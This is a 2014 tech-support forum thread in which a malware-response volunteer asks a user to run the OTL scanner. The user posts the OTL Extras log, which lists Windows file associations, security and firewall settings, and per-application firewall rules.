2014-01-02 09:38:16 -------- d-----w- C:\Program Files (x86)\DiggiCoauPOnu
2013-12-30 04:40:12 -------- d-----w- C:\ProgramData\ShoPDroop
2013-12-30 04:40:11 -------- d-----w- C:\ProgramData\ehbflkekalelehfndkkdnopooeaopkmk
2013-12-30 04:40:08 -------- d-----w- C:\Users\Bri\AppData\Local\Packages
2013-12-30 04:40:01 -------- d-----w- C:\ProgramData\3e010479f616da2d
2013-12-30 04:39:58 -------- d-----w- C:\ProgramData\DiggiCoauPOnu
2013-12-29 07:20:54 -------- d-----w- C:\ProgramData\WinSpeed
2013-12-27 02:00:58 368640 ----a-w- C:\windows\SysWow64\ReWire.dll
2013-12-27 02:00:58 233472 ----a-w- C:\windows\SysWow64\REX Shared Library.dll
2013-12-27 01:59:09 -------- d-----w- C:\Program Files (x86)\Ableton
.
==================== Find3M  ====================
.
2013-12-12 01:22:31 71048 ----a-w- C:\windows\SysWow64\FlashPlayerCPLApp.cpl
2013-12-12 01:22:31 692616 ----a-w- C:\windows\SysWow64\FlashPlayerApp.exe
2013-11-27 06:07:44 10856 ----a-w- C:\windows\System32\drivers\mfeclnrk.sys
2013-11-27 06:07:22 96112 ----a-w- C:\windows\System32\drivers\mfencrk.sys
2013-11-27 06:07:02 411944 ----a-w- C:\windows\System32\drivers\mfencbdc.sys
2013-11-05 00:51:44 70112 ----a-w- C:\windows\System32\drivers\cfwids.sys
2013-11-05 00:46:34 343696 ----a-w- C:\windows\System32\drivers\mfewfpk.sys
2013-11-05 00:46:16 182752 ----a-w- C:\windows\System32\mfevtps.exe
2013-11-05 00:43:04 782360 ----a-w- C:\windows\System32\drivers\mfehidk.sys
2013-11-05 00:41:22 519576 ----a-w- C:\windows\System32\drivers\mfefirek.sys
2013-11-05 00:40:00 311120 ----a-w- C:\windows\System32\drivers\mfeavfk.sys
2013-11-05 00:39:20 179792 ----a-w- C:\windows\System32\drivers\mfeapfk.sys
.
============= FINISH: 14:33:00.57 ===============

Attached Files


"Nothing says sausage like sausage!"


BC AdBot (Login to Remove)

 


#2 Noviciate

Noviciate

  • Malware Response Team
  • 5,277 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Numpty HQ
  • Local time:08:37 PM

Posted 05 January 2014 - 02:50 PM

Good evening. :)

Download OTL by OldTimer from here and save it to your Desktop.

  • Double click the tool to run it.
  • Click the Quick Scan button and allow it to do it's thing.
  • Once complete, it should open two Notepad Windows - OTL.Txt and Extras.Txt
  • It should also save copies in the same location as OTL.
  • I want you to copy and paste the contents of OTL.txt that should appear into one reply and Extras.Txt into another.
  • The length of the two logs sometimes results in the end being chopped off if you post both in one reply.


So long, and thanks for all the fish.

 

 


#3 SpaciousSpace

SpaciousSpace
  • Topic Starter

  • Members
  • 43 posts
  • OFFLINE
  •  
  • Gender:Female
  • Location:Washington
  • Local time:12:37 PM

Posted 05 January 2014 - 05:06 PM

It won't let me post the OTL.Txt because the site says I've posted too many emoticons. :P

 

OTL Extras logfile created on: 1/5/2014 1:30:59 PM - Run 1
OTL by OldTimer - Version 3.2.69.0     Folder = C:\Users\Bri\Desktop
64bit- Home Premium Edition  (Version = 6.1.7600) - Type = NTWorkstation
Internet Explorer (Version = 8.0.7600.16385)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy
 
3.80 Gb Total Physical Memory | 0.93 Gb Available Physical Memory | 24.44% Memory free
7.61 Gb Paging File | 3.94 Gb Available in Paging File | 51.85% Paging File free
Paging file location(s): ?:\pagefile.sys [binary data]
 
%SystemDrive% = C: | %SystemRoot% = C:\windows | %ProgramFiles% = C:\Program Files (x86)
Drive C: | 254.14 Gb Total Space | 21.11 Gb Free Space | 8.31% Space Free | Partition Type: NTFS
Drive D: | 29.00 Gb Total Space | 27.38 Gb Free Space | 94.44% Space Free | Partition Type: NTFS
 
Computer Name: BRI | User Name: Bri | Logged in as Administrator.
Boot Mode: Normal | Scan Mode: Current user | Quick Scan | Include 64bit Scans
Company Name Whitelist: On | Skip Microsoft Files: On | No Company Name Whitelist: On | File Age = 30 Days
 
========== Extra Registry (SafeList) ==========
 
 
========== File Associations ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.url[@ = InternetShortcut] -- C:\windows\SysNative\rundll32.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]
.cpl [@ = cplfile] -- C:\windows\SysWow64\control.exe (Microsoft Corporation)
 
========== Shell Spawning ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
inffile [install] -- %SystemRoot%\System32\rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %1 (Microsoft Corporation)
InternetShortcut [open] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL %l (Microsoft Corporation)
InternetShortcut [print] -- "C:\Windows\System32\rundll32.exe" "C:\Windows\System32\mshtml.dll",PrintHTML "%1" (Microsoft Corporation)
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Bridge] -- C:\Program Files (x86)\Adobe\Adobe Bridge CS5\Bridge.exe "%L" (Adobe Systems, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<key>\shell\[command]\command]
batfile [open] -- "%1" %*
cmdfile [open] -- "%1" %*
comfile [open] -- "%1" %*
cplfile [cplopen] -- %SystemRoot%\System32\control.exe "%1",%* (Microsoft Corporation)
exefile [open] -- "%1" %*
helpfile [open] -- Reg Error: Key error.
piffile [open] -- "%1" %*
regfile [merge] -- Reg Error: Key error.
scrfile [config] -- "%1"
scrfile [install] -- rundll32.exe desk.cpl,InstallScreenSaver %l
scrfile [open] -- "%1" /S
txtfile [edit] -- Reg Error: Key error.
Unknown [openas] -- %SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1
Directory [Bridge] -- C:\Program Files (x86)\Adobe\Adobe Bridge CS5\Bridge.exe "%L" (Adobe Systems, Inc.)
Directory [cmd] -- cmd.exe /s /k pushd "%V" (Microsoft Corporation)
Directory [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [open] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
Folder [explore] -- Reg Error: Value error.
Drive [find] -- %SystemRoot%\Explorer.exe (Microsoft Corporation)
 
========== Security Center Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"cval" = 1
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
"VistaSp1" = 28 4D B2 76 41 04 CA 01  [binary data]
"AntiVirusOverride" = 0
"AntiSpywareOverride" = 0
"FirewallOverride" = 0
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc\Vol]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirewallDisableNotify" = 0
"AntiVirusDisableNotify" = 0
"UpdatesDisableNotify" = 0
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Svc]
 
========== System Restore Settings ==========
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
"DisableSR" = 0
 
========== Firewall Settings ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\DomainProfile]
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\WindowsFirewall\StandardProfile]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
"DisableNotifications" = 0
"EnableFirewall" = 1
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile]
"DisableNotifications" = 0
"EnableFirewall" = 0
 
========== Authorized Applications List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
 
 
========== Vista Active Open Ports Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{068FCABA-B693-4E2A-A238-330B6121B363}" = rport=2177 | protocol=6 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{13EEC669-70D5-4715-8233-34A1CF607AEA}" = rport=138 | protocol=17 | dir=out | app=system | 
"{222F760E-583E-4E7A-AA00-33F55A448E60}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=svchost.exe | 
"{28F23C13-45C0-41B9-B59D-7BB452359607}" = lport=2177 | protocol=17 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{2E4BB394-9425-479B-ADC4-7BB283CBB728}" = lport=2869 | protocol=6 | dir=in | name=windows live communications platform (upnp) | 
"{2F01CDFA-5FE6-462E-8BA8-B3B1AB12D85E}" = lport=37674 | protocol=17 | dir=in | name=oovoo udp port 37674 | 
"{3B46B732-D14B-439A-9D00-DD443135C696}" = lport=138 | protocol=17 | dir=in | app=system | 
"{3D6E352E-38DE-4CDA-BCB8-FE8FD181BE74}" = lport=37675 | protocol=17 | dir=in | name=oovoo udp port 37675 | 
"{40B44815-434E-41F1-BEF3-9E7A21577D7B}" = rport=2177 | protocol=17 | dir=out | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{4394043B-8506-43F9-845D-2AD38C358E4F}" = rport=427 | protocol=17 | dir=in | svc=hpslpsvc | app=c:\windows\system32\svchost.exe | 
"{44D1C170-1D25-4718-B7BE-195F97E49BB3}" = rport=445 | protocol=6 | dir=out | app=system | 
"{4DAC2BEA-5FEE-440B-ABFB-F4B82BE41B36}" = lport=137 | protocol=17 | dir=in | app=system | 
"{536FBE0F-F79D-487A-8221-0C9835B9D8F8}" = lport=10243 | protocol=6 | dir=in | app=system | 
"{54EAEE43-B305-4BD6-BE97-87ACB1E0DEFE}" = lport=37674 | protocol=6 | dir=in | name=oovoo tcp port 37674 | 
"{6803B4C0-2AA6-4141-AA69-5DA4F8166CDD}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{78FA17B8-89A8-440A-A070-49AB7AFD989A}" = rport=10243 | protocol=6 | dir=out | app=system | 
"{7938B6CD-163F-491C-A9D2-C31214E824AD}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{7F6E5009-03E0-4A31-87D7-6856A54EDEBA}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{8B2B7B42-D3D3-4FAB-B0DE-FD025694A59F}" = lport=5355 | protocol=17 | dir=in | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{92E6122C-D97E-416B-8352-878615A7A6E5}" = lport=1900 | protocol=17 | dir=in | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{9DADDD91-663A-4164-8F10-CF85DCD2CC20}" = lport=443 | protocol=6 | dir=in | name=oovoo tcp port 443 | 
"{9DEB95C1-4408-4DDC-9300-B40FBE458C38}" = lport=2177 | protocol=6 | dir=in | svc=qwave | app=%systemroot%\system32\svchost.exe | 
"{A0271C7D-6F44-4BD4-806F-BEC09ADC6D0A}" = lport=rpc-epmap | protocol=6 | dir=in | svc=rpcss | name=@firewallapi.dll,-28539 | 
"{A2F6490B-3553-4489-9229-806D4F61FB99}" = lport=139 | protocol=6 | dir=in | app=system | 
"{A637B0BF-1E7D-41F0-9509-B97F25D7C4BB}" = lport=rpc | protocol=6 | dir=in | svc=spooler | app=%systemroot%\system32\spoolsv.exe | 
"{A6B2E2AA-1B86-4B4E-8E8D-2DD45FF137EA}" = lport=445 | protocol=6 | dir=in | app=system | 
"{A814C664-8939-4714-AF6B-237ED6141BF9}" = rport=5355 | protocol=17 | dir=out | svc=dnscache | app=%systemroot%\system32\svchost.exe | 
"{AC5A3B70-0FB5-4CB5-A74E-94904B337051}" = lport=2869 | protocol=6 | dir=in | app=system | 
"{CBDA850A-3AFB-476F-8BD5-5D0C68588868}" = rport=137 | protocol=17 | dir=out | app=system | 
"{DE3BB48E-34B3-4664-A85C-A9700D43DB34}" = lport=1900 | protocol=17 | dir=in | name=windows live communications platform (ssdp) | 
"{E0751A4B-264D-44CE-92C7-9B3345FB2053}" = rport=139 | protocol=6 | dir=out | app=system | 
"{E889ADD1-CC20-46F2-9F1F-99889205EC61}" = rport=1900 | protocol=17 | dir=out | svc=ssdpsrv | app=%systemroot%\system32\svchost.exe | 
"{E93619EA-BFE2-4A17-B1C6-4E90FB0BB0B6}" = lport=443 | protocol=17 | dir=in | name=oovoo udp port 443 | 
"{EA4612C1-68D2-4E97-9410-08FC5D43DFEF}" = lport=6004 | protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\outlook.exe | 
 
========== Vista Active Application Exception List ==========
 
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules]
"{0194DFEE-4421-4364-ABBA-CFD9E46C7366}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed\assassinscreed_launcher.exe | 
"{01E7D2E2-2D3B-41E1-99F5-1C5E4CDB3D8A}" = protocol=6 | dir=in | app=c:\program files (x86)\veoh networks\veohwebplayer\veohwebplayer.exe | 
"{0251B53F-D1C3-4250-BF2D-629DF22DAC41}" = dir=in | app=c:\program files\lenovo\readycomm\appsvc.exe | 
"{03F07C92-558F-4B57-A465-9BE6A2DBF1F0}" = protocol=17 | dir=in | app=c:\users\bri\appdata\local\google\google talk plugin\googletalkplugin.exe | 
"{042773F2-ECC5-45CD-8749-F7BA3467A020}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\assassinscreedbrotherhood.exe | 
"{0702A770-C922-4BFF-9315-10007B19B486}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{08A77954-81D9-4456-93D6-A57E63401C92}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe | 
"{09AB3C6A-5A46-4F67-80AC-64BA28A99AF3}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe | 
"{0F0F372E-E0C2-45CB-B088-C689AD6CEE14}" = dir=in | app=c:\program files (x86)\windows live\contacts\wlcomm.exe | 
"{0F3AEDB0-A9EE-48B8-AEF6-CDD11D7E3129}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{117567C0-EDBA-4C03-B722-005A5C30AC9C}" = protocol=6 | dir=in | app=c:\users\bri\appdata\local\google\google talk plugin\googletalkplugin.exe | 
"{1248D76C-4CF2-4D16-BE4F-D427B377A22E}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgpc01.exe | 
"{16DFCBE3-FE02-41F0-8852-8C716883417C}" = protocol=17 | dir=in | app=c:\program files (x86)\teamviewer\version7\teamviewer_service.exe | 
"{1792671F-116A-4C43-BD3B-13D9CD9B74D2}" = protocol=17 | dir=in | app=c:\program files (x86)\veoh networks\veohwebplayer\veohwebplayer.exe | 
"{1CB699A7-0B62-43BC-B60D-27E7B1B027CC}" = dir=in | app=f:\setup\hpznui40.exe | 
"{1CF8CC97-2DA2-4E9B-9505-4B08582C36FE}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqusgh.exe | 
"{1FAE3CEF-1409-4E41-94D5-4F5ED9093F8A}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe | 
"{20DD5F44-AAFD-4216-96BF-C0B24CA4EAB1}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\assassinscreedbrotherhood.exe | 
"{22084A9F-95CD-4E8B-9FB7-4961245AFC60}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe | 
"{227273A9-887F-4699-A0DA-AC040D5FECFC}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqkygrp.exe | 
"{24D33E4C-0288-4B08-A909-01A71D7B2A08}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqtra08.exe | 
"{26B90B01-3C8E-48F1-B8F2-175C5658744C}" = protocol=17 | dir=in | app=c:\program files (x86)\yahoo!\messenger\yahoomessenger.exe | 
"{26C055A8-5B74-4D81-A8DB-8972C432807C}" = protocol=6 | dir=out | svc=upnphost | app=%systemroot%\system32\svchost.exe | 
"{26D27860-C661-40E2-AEED-7A6E2BF4A7A3}" = protocol=6 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{27B6B61D-FD73-4008-8EF5-9A336E9A838C}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed\assassinscreed_dx9.exe | 
"{35D8262B-F774-4E64-A111-B266E09C08DD}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed\assassinscreed_dx10.exe | 
"{36F1DEAB-814F-4435-8819-A072E2007505}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe | 
"{3DF022BC-0B2A-4093-A544-F91689AF0594}" = protocol=17 | dir=in | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{3F68FDD5-9856-451E-9B4F-BCB430EC57D9}" = protocol=17 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.patch.exe | 
"{3FB0E52A-3AA6-455A-A65D-3D1702B03EC7}" = protocol=17 | dir=in | app=c:\users\bri\appdata\roaming\dropbox\bin\dropbox.exe | 
"{43D68032-61A5-4E6E-B6CC-A4B3CD8BDE6E}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed\assassinscreed_dx10.exe | 
"{44D59B65-D68C-43A6-92A9-C2BC3EE787D9}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\platform\mcsvchost\mcsvhost.exe | 
"{45D1D49E-3E0F-4140-86CC-E4A389238712}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe | 
"{46F16BFB-0BE6-475E-9507-2C62985D4198}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe | 
"{4778050C-014E-4F83-86AD-7E6F437CAEC3}" = dir=out | app=c:\program files (x86)\lenovo\readycomm\common\igrs.exe | 
"{494862AB-6440-4958-A06C-9948CBE556C2}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\criticalmassdemo\criticalmassdemo.exe | 
"{4BE75705-03C8-4BFA-B2D3-613BFA114751}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\scoregasm demo\scoregasm demo.exe | 
"{4DCEFEFA-4278-4C89-94B7-EE70B932914C}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hposid01.exe | 
"{513E01DC-3FE1-4BC5-946D-89BC5B8FAEA2}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqcopy2.exe | 
"{52FA3BEC-236D-40CD-A409-E0A0B8FA68FA}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\portal 2\portal2.exe | 
"{572EDDC2-66F3-47C4-BAE5-E0831479F464}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\uplaybrowser.exe | 
"{5911A99E-DFC9-434F-928E-46D235CD04DC}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{59C15B04-EE30-4A26-BADA-74656AB06D1E}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstra.exe | 
"{5B657D67-8C0E-4C8C-B032-059C94D035D3}" = dir=in | app=c:\program files\lenovo\readycomm\connsvc.exe | 
"{5E00870B-163C-4E78-970A-9F3A55877333}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead\left4dead.exe | 
"{5FF5D4C2-7544-4ADB-B960-624B9BF06087}" = protocol=1 | dir=in | name=@firewallapi.dll,-28543 | 
"{6024FB4A-8A48-41A5-AC15-5792EF3BE85C}" = dir=out | app=c:\windows\system32\igrssvcs.exe | 
"{6324BDBB-7907-436C-89F5-84CA9DC12220}" = protocol=6 | dir=in | app=c:\windows\syswow64\pnkbstrb.exe | 
"{66CDC281-4A16-446C-BB39-263740340DBB}" = dir=out | app=c:\program files\lenovo\readycomm\readycomm.exe | 
"{66F3C46D-6985-4405-8510-532E38ED708E}" = protocol=17 | dir=in | app=c:\windows\syswow64\pnkbstra.exe | 
"{68880E26-7438-4538-84C0-5D7C84224EC5}" = dir=in | app=c:\program files (x86)\hp\hp software update\hpwucli.exe | 
"{6CA02442-D8F3-4CD6-93AC-3CE337A1FA08}" = protocol=6 | dir=out | app=system | 
"{6EEDB32A-5613-44B0-B5E5-0C358793713F}" = protocol=6 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{6FAE8028-4FB4-49C3-B485-0555BB69D161}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpqgplgtupl.exe | 
"{7299B8AF-25C3-48D4-8866-354BE8E9E5BA}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed\assassinscreed_launcher.exe | 
"{749E0DC7-B2CC-4AD7-AD09-667E55916622}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\acbmp.exe | 
"{78F95A99-3007-4F0C-B2F8-89B64AA442C3}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\ai war fleet command\aiwar.exe | 
"{79F6772B-8C98-4235-9F76-CE2CD9419B34}" = dir=in | app=c:\program files\lenovo\readycomm\projectionist.exe | 
"{7D8DC141-D815-4041-B557-E61795EEB4E5}" = protocol=17 | dir=in | app=c:\program files\common files\mcafee\mcsvchost\mcsvhost.exe | 
"{83A59597-6E2A-4EC8-9F10-284F71AA15C5}" = dir=in | app=c:\users\bri\appdata\local\facebook\video\skype\facebookvideocalling.exe | 
"{85A39BC2-A57B-4824-87BF-DF1ED281199B}" = dir=out | app=c:\program files (x86)\lenovo\readycomm\common\igrs.exe | 
"{89CB25C1-31E5-44AF-98E2-AA92158234C5}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\ubisoft game launcher\ubisoftgamelauncher.exe | 
"{89D5A799-146A-48A5-AA7C-196C238D85DD}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\groove.exe | 
"{8A2150BF-A7FE-4466-8852-F20729097ED1}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\acbmp.exe | 
"{8BDF79E7-0259-410E-BDD7-706A30A3DD44}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{8C1AADE3-6816-4DC7-877D-56DE87D08629}" = dir=in | app=c:\program files (x86)\common files\apple\apple application support\webkit2webprocess.exe | 
"{8C3BF49C-7D06-4A2C-88DB-9E9A40FC3BA6}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{8E6C5F29-3035-453D-941C-180B5A97A510}" = dir=in | app=c:\windows\system32\igrssvcs.exe | 
"{9217D1A6-50E4-4F75-8194-102DBBA1F555}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\uplaybrowser.exe | 
"{9353571D-3A99-4BFA-B453-FAE1FD4AAD81}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead\left4dead.exe | 
"{93B282B8-28D5-4D81-98EF-1CD1DAED2D04}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\vertex dispenser demo\vertex dispenser demo.exe | 
"{96685991-93D1-4751-BA1B-FDD0A4DF9D11}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmplayer.exe | 
"{96858D68-AC40-43BD-9E8F-E1D628A73CED}" = protocol=17 | dir=in | app=c:\program files (x86)\ubisoft\assassin's creed brotherhood\acbsp.exe | 
"{99ECC168-5CB4-40DB-90DB-C8DFBCA48ACA}" = dir=in | app=c:\program files (x86)\hp\digital imaging\smart web printing\smartwebprintexe.exe | 
"{9CAB26D7-C278-450B-9601-C477F8E6BAB0}" = dir=out | app=c:\program files\lenovo\readycomm\appsvc.exe | 
"{A1CF2B46-4E6C-4C74-9159-7FBCDCCF7573}" = protocol=6 | dir=in | app=c:\program files\common files\mcafee\mcsvchost\mcsvhost.exe | 
"{A246E5A6-61DA-4574-9D66-A314D5C0885C}" = protocol=6 | dir=in | app=c:\program files (x86)\teamviewer\version7\teamviewer.exe | 
"{A3ED708B-8B05-4EB8-A79C-7C65AE51343B}" = protocol=6 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.exe | 
"{A411FF91-C24F-41B2-BEBF-49D3614F5C43}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpiscnapp.exe | 
"{A9DDAD28-1B8C-414A-8D90-AADD37B42CFB}" = protocol=17 | dir=in | app=c:\program files (x86)\steam\steamapps\common\left 4 dead\left4dead.exe | 
"{AB101E14-A65E-4FA1-8C9F-2A5C967C5A78}" = protocol=17 | dir=out | app=%programfiles(x86)%\windows media player\wmplayer.exe | 
"{AB16E67E-0A39-4F60-90B9-7AEF8F806657}" = protocol=6 | dir=out | app=%programfiles%\windows media player\wmplayer.exe | 
"{ABFC65E2-946C-485E-85C5-5DB94CDFF768}" = protocol=6 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.patch.exe | 
"{B03FFA6D-3234-4EE6-835D-3FA20CD18519}" = protocol=6 | dir=in | app=c:\program files (x86)\yahoo!\messenger\yahoomessenger.exe | 
"{B0975025-6546-47CC-BE99-5139A7256F71}" = protocol=17 | dir=in | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{B4412AB5-E333-47A0-BA38-A8EAFBDD0B20}" = protocol=6 | dir=in | app=c:\program files (x86)\ubisoft\ubisoft game launcher\ubisoftgamelauncher.exe | 
"{B458D8E3-4F7C-484A-B02B-2B609D3B3181}" = protocol=6 | dir=in | app=c:\program files (x86)\steam\steamapps\common\audiosurf\engine\questviewer.exe | 
"{B7EB5F73-D55F-457D-8400-7DF9A84D83FF}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe | 
"{B811DE8C-CC18-48BA-AD26-EFEFC0A6E454}" = protocol=17 | dir=in | app=c:\program files (x86)\microsoft office\office14\groove.exe | 
"{B8326149-06DF-4A5F-8960-FBADE8DCCFFA}" = protocol=6 | dir=in | app=c:\program files (x86)\microsoft office\office14\onenote.exe | 
"{B9FD7BCF-9F49-4F55-A3B1-94489BF136C4}" = protocol=17 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.patch.exe | 
"{BAA7A9ED-76CA-4703-9A25-554DDB8566D3}" = protocol=6 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.exe | 
"{BAD3F622-55EE-4457-9D34-926CE6B15469}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpfccopy.exe | 
"{BB19518E-F266-4F57-AB02-AE6E357DDBAB}" = protocol=17 | dir=out | app=%programfiles%\windows media player\wmpnetwk.exe | 
"{BC9172B7-368F-42A7-A7AE-C4D7A2F066C5}" = protocol=17 | dir=in | app=c:\program files (x86)\world of warcraft\launcher.exe | 
"{BD08454E-A80A-4C1B-84FD-5DA6D6045453}" = protocol=6 | dir=in | app=c:\users\bri\appdata\roaming\dropbox\bin\dropbox.exe | 
"{CA1E8E1D-A0AA-4FD0-8945-4AF9E6C77AF3}" = dir=in | app=c:\program files (x86)\hp\digital imaging\bin\hpoews01.exe | 
"{CA56F401-8B9F-4960-B3E8-ED1371A98609}" = protocol=1 | dir=out | name=@firewallapi.dll,-28544 | 
